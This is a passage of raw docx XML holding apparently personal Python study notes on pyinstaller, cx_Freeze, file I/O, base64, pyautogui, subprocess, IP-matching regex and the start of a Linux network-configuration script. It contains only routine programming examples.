            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>https://stackoverflow.com/questions/53798660/pyinstaller-command-not-found</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="253FA9A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Troubleshooting </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>pyinstaller</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> issues</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="165BC0E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90382C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To install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pyinstaller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>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76BDF77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python -m pip install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pyinstaller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--user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IGS;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="70CBA03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CF48B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 compile a .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>py</w:t>
      </w:r>
      <w:proofErr w:type="spell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file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01252E0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python -m </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>pyinstaller</w:t>
      </w:r>
      <w:proofErr w:type="spell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main.py --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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onefile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0A63C06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D9CF1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python -m </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>pyinstaller</w:t>
      </w:r>
      <w:proofErr w:type="spell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single.py;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="51E9B0B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2DC73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Location of .exe file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="303F8F73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37ED63E" wp14:editId="63EE0FD8">
            <wp:extent cx="1549400" cy="3771900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="117" name="Pictur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EF0C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A2DEF1F" w14:textId="77777777" w:rsidR="005D4128" w:rsidRDefault="005D4128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68185032" w14:textId="53825619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=== Installing modules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C96DB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r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sudo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python3 -m pip install &lt;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moduleName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="55823635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EE2ACF5" wp14:editId="19120487">
            <wp:extent cx="6096000" cy="3937000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="118" name="Pictur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625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5D7DB0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test.py:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14FA8E90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3447A7E" wp14:editId="551C309A">
            <wp:extent cx="5194300" cy="2311400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="119" name="Pictur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BD6D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1AD0C1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6B55AB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6661DA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68BB30E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br w:type="page"/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00233C26">
        <w:rPr>
          <w:rFonts w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>cx_Freeze</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="48610CC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February 1, 2024</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E352A2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9:16 AM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="689FFD6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# Installing another compiler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC9385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python -m pip install </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>cx_Freeze</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E82B52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76D3DD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# Compiling a .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>py</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64EA275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python -m </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>cx_Freeze</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> single.py;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F3097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7BF1F8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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A295D33" w14:textId="76C7FFB3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OS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FE9619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September 15, 2023</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3751C58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3:23 PM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5714C16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90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Python Tutorial: OS Module - Use Underlying Operating System Functionality</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="524CB767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5817550" wp14:editId="427E5115">
            <wp:extent cx="3378200" cy="1892300"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="120" name="Pictur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4D79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46F884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 OS Module</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75CC167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import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os</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3187754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4AB03B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FBAD5B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DA634A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D0FA846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4C3E128D" w14:textId="71A9758D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File I/O</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="045A940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21EE6E9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4:32 PM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53169091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3B4FD7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#fd = open("C:\\Users\\IGS\\Desktop\\flag.txt", "r")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="716CA28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#file = open("C:\\Users\\IGS\\Desktop\\flag.txt", "r+")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA52A1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open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"C:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="AB9464"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>\\</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="CB8F76"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Users</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="AB9464"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>\\</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="CB8F76"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>IGS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="AB9464"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>\\</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="CB8F76"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Desktop</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="AB9464"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>\\</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="CB8F76"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>flag.txt"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"w+"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E4D25B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Read contents from file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60AC206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contents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46645AE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contents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300F67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tell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())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26FBE7D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Read first 4 char only</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28F99D7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#contents =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file.read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(4)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B1B865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Writing to files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39FDD82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contents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"success"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A5B1A0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contents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401622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contents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41FE23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close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0637171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Close file after reading contents</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A7E0B4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20844E0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92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https://stackabuse.com/file-handling-in-python/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0EB35B10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02F9765D" wp14:editId="373E7832">
            <wp:extent cx="4978400" cy="6946900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="121" name="Pictur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694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1E7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D2E180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7295E8A9" wp14:editId="7C0B8BB5">
            <wp:extent cx="5029200" cy="5930900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="122" name="Pictur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A14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35CA7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Appending &amp; Writing to Binary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A5C3C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95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https://stackoverflow.com/questions/21220916/writing-bits-to-a-binary-file</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5F545CC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277C33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789D48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DABF373" w14:textId="2CB73742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br w:type="page"/>
      </w:r>
      <w:r w:rsidR="00233C26">
        <w:rPr>
          <w:rFonts w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Base64 Encoding Binary Files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A74E8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February 1, 2024</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="257C836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4:47 PM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34C9277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hyperlink r:id="rId196" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>Base64 Encoding Binary Files in Python</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="23FC949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BDC5452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1FBA9BF" wp14:editId="0EABDC22">
            <wp:extent cx="3378200" cy="1892300"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="123" name="Pictur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98D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24456A2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2BC8AD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1 byte = 8 bits</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="562691C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10011011 = 8 bits = 1 byte</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B4347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10110110 01100011 000001100 = 3 * 8 bits = 3 bytes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C4CE47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We can take the first 6 bits</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE6588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101101 100110 001100 001100 = 4 * 6 bits</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BDF8AC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DB3295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7228AC5C" wp14:editId="1D69457A">
            <wp:extent cx="5651500" cy="5486400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="124" name="Pictur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04C8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CF3CA8E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6A9B1D21" wp14:editId="5BB96396">
            <wp:extent cx="5613400" cy="3683000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="125" name="Pictur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E6D5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1A4C46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91030B6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Port Scanner</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D2988E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February 15, 2024</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D76535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2:12 PM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F67CFB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C97EE8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BA7800C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proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Pyautogui</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Send keystrokes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13E82AB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September 15, 2023</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CBABC8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3:36 PM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32DEE33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Control mouse &amp; keyboard to any apps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC008A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118CDA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terminal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F974BF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pip3 install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pyautogui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;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="5A4A7F6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7065FA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py</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4A8F977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import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pyautogui</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="01B3040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BAF53A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29A50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8AC1F0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9BE6970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7E305A69" w14:textId="0BCFB0CD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Subprocess</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="200977C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September 15, 2023</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26454DC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3:06 PM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC5E3D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00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Python Tutorial: Calling External Commands Using the Subprocess Module</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="01C2CEC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83850E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22E6135" wp14:editId="785427C9">
            <wp:extent cx="3378200" cy="1892300"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="126" name="Pictur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43EF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410C5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To send commands, stdin,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stdout</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4182067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43F064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import subprocess</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E0C61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1BE9D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Sending 'ls' command in Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BE7EC8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'ls', shell=True)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B6A9D4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process1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['ls', '-la'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3420DEF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print(p1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C16CE0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1EB892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Capturing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stdout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in Bytes (Does NOT show spaced contents)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F9CBD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process1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['ls', '-la'],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capture_output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=True)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="210D470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print(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process1.stdout)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1569B3A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1EC42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Capturing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stdout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in TEXT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E589B0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process1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['ls', '-la'],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capture_output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=True, text=True)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="484073F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print(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process1.stdout)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BACF64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571338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OR</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42D26FD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Capturing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stdout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in TEXT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E18CAD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process1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['ls', '-la'],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stdout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=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subprocess.PIPE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, text=True)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3829939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print(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process1.stdout)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E109FC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CED33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Redirecting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stdout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 to a file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F8A903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with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open(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'output.txt', 'w') as f:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31CC867F" w14:textId="77777777" w:rsidR="00233C26" w:rsidRDefault="00233C26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Redirecting to our file 'f'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E50863D" w14:textId="77777777" w:rsidR="00233C26" w:rsidRDefault="00233C26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p1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['ls', '-la'],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stdout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=f, text=True)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="423A8C4E" w14:textId="77777777" w:rsidR="00233C26" w:rsidRDefault="00233C26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5B25646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Listing a non-existed directory in Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4488A12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p2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['ls', '-la', '/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notExist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 xml:space="preserve">',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capture_output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=True, text=True, check=True)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="489A11D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AADD9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print(p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2.returncode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0B04A39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will not work =&gt; Python does not necessarily return error code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C0452E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print(p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2.stderr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5CED8EE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913BF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p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2.returncode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!= 0 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB5739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...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="121FC53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DE922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Redirecting stderr to /dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60997F3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p3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['ls', '-la', '/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notExist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'], stderr=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subprocess.DEVNULL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7BB3334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print(p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3.stderr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24C32F1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F3633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cat file.txt | grep content</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A31521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p4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['cat', 'test.txt'],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capture_output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=True, text=True, stderr=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subprocess.DEVNULL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212685B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print(p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4.stdout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5DE5472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FE866E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Passing p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4.stdout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=&gt; p5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51C1B3A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p5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['grep', '-n', 'test'],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capture_output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=True, text=True, input=p4.stdout)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F158C1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8AC55A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OR use shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="165FA95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p6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'cat test.txt | grep -n test',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capture_output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=True, text=True, shell=True)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EF019C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print(p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6.stdout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0C193FA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FABE69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Sending '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dir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' command in Windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40B9676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spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>subprocess.run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('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dir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')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23BF9CC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8EE3C0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681F286" w14:textId="77777777" w:rsidR="00233C26" w:rsidRDefault="00095BB5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  <w:r w:rsidR="00233C26">
        <w:rPr>
          <w:rFonts w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>RE (regex)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3241BC9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October 4, 2023</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EEC083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2:25 PM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6004751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02" w:anchor=":~:text=When%20a%20string%20matches%20a%20regex%20pattern%20using%20match(),a%20match%20object%20is%20returned.&amp;text=You%20can%20get%20the%20position,end()%20%2C%20and%20span()%20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https://note.nkmk.me/en/python-re-match-object-span-group/#:~:text=When%20a%20string%20matches%20a%20regex%20pattern%20using%20match(),a%20match%20object%20is%20returned.&amp;text=You%20can%20get%20the%20position,end()%20%2C%20and%20span()%20</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="260C829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8F9C9A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1B99808" w14:textId="58DFB3AB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IP regex</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="380A439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September 15, 2023</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CD106F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3:29 PM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A06557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match 10-19 only:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="600A184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^\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b(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10|1[0-9])\b$</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E52A92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430D21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match 171-179 only:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF9167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^\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b(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17[1-9])\b$</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31DFF06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71788F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match 10-19only OR 171-179only:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CED95B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^\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b( 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group1) | (group2) | (group3) )\b$</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2195533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8A7291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^\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b(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(10|1[0-9])|(17[1-9]))\b$</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE15B8F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F873BAF" wp14:editId="1209978C">
            <wp:extent cx="2959100" cy="6426200"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="127" name="Pictur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59E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C10F9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match 10-19, 171-179, 191-199 only:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B8132E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^\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b( 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10|1[0-9]) | (17[1-9]) | (19[1-9]) )\b$</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0689E624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150789B6" wp14:editId="5D3AD944">
            <wp:extent cx="3556000" cy="8470900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="128" name="Pictur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847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A4F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B1C09F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To match (10-19|171-179|191-199).0-255.0-255.0-254:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DB778B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A.B.C.D =</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="329FB7F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=&gt; ^\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b(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(10|1[0-9])|(17[1-9])|(19[1-9]))\b \.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="346229C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 =&gt; (([01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]?[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0-9][0-9]?|2[0-4][0-9]|25[0-5]))\b \.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E941A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 =&gt; (([01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]?[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0-9][0-9]?|2[0-4][0-9]|25[0-5]))\b \.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7387C03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 =&gt; (([01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]?[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0-9][0-9]?|2[0-4][0-9]|25[0-4]))\b</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39E6BC9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3DD3A2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A.B.C.D =</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="390BDEF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^\b((10|1[0-9])|(17[1-9])|(19[1-9]))\b\.(([01]?[0-9][0-9]?|2[0-4][0-9]|25[0-5]))\b\.(([01]?[0-9][0-9]?|2[0-4][0-9]|25[0-5]))\b\.(([01]?[0-9][0-9]?|2[0-4][0-9]|25[0-4]))\b\b$</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1774FDC0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35ADF0DA" wp14:editId="6CFDAB4B">
            <wp:extent cx="5168900" cy="8559800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="129" name="Pictur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855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70A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EAE3C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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6131536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C58CDBD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networking.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D99E2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16, 2024</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78953DD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10:50 PM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10727518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202C34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--------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F0B59E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Imports modules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4184F99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--------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2566F2D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from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="979797"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> . </w:t>
      </w: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sys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os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Back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Style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getpass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re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time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="797DE5C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 xml:space="preserve">import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ipcalc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6DE624A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# Configure Linux networking at ease :)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31189DB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networkConfig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user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sudo_password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formatted_time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):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="186846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736E636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Configuring a network interface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE9313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'Enter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a network interface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iface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name [e.g. eth0]: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91255D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F72DB0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regex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'^((\w+)|(\d+))$'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5448E2B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0B2F9F5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validate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match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regex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D0194C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#print(Fore.WHITE +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f'validate.match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: {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validate.match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}')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B5F9B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#print(Fore.YELLOW +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f'validate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boolean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>: {validate}')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60392C9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r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="72A1BA"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
